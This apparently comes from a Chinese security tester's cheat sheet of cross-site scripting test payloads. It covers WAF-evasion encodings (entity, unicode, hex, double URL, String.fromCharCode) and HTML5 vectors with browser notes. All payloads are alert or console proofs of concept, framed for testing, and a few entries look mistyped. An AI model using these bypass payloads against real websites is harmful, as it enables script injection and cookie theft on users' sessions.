'XSS进阶'

常用测试语句

1
2
3
4
5
6
7
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<a href=javascript:alert(1)>
console.log(/xss/)测试时,让XSS语句弹到console控制台,避免对网站造成损害
console.log(document.cookie)
<ſcript>alert(1)</ſcript> 古英语ſ 在进行全大写waf时,把ſ 替换成S

编码绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
我们要输入的代码:
<img src="" onerror=alert(1)>
1,HTML实体编码替换双引号:
<img src=&#8220;&#8221; onerror=alert(1)>
2,JS编码(unicode)替换尖括号(JS实际上有四种字符编码策略):
\u003cimg src="" onerror=alert(1)\u003e
3,JS编码(base16)替换括号:
\x28\x29<img src="" onerror=alert\x281\x29>
4,URL编码,如果alert被过滤(URL编码两次):
<img src="" onerror=%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34>
5,String.fromCharCode方法替换所有字符:
String.fromCharCode(60,105,109,103,32,115,114,99,61,34,34,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,49,50,51,41,62)
6,ANSI编码局部替换er:
<img src="" onerror=al%65%72t(1)>

html5特性

1
2
3
4
5
6
7
<embed src="javascript:alert(1)">  //火狐,谷歌6.0以下
<image src="javascript:alert(1)"> //IE6
<srcipt src="javascript:alert(1)"> //IE6
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object> //火狐,谷歌
<input onfocus=alert(1) autofocus> //IE10,火狐4.0,谷歌
<svg onload="javascript:alert(1)"
xmlns="http://www.w3.org/2000/svg"> //IE9,火狐,谷歌

扩展文章
https://xz.aliyun.com/t/4067
https://momomoxiaoxi.com/2017/10/10/XSS/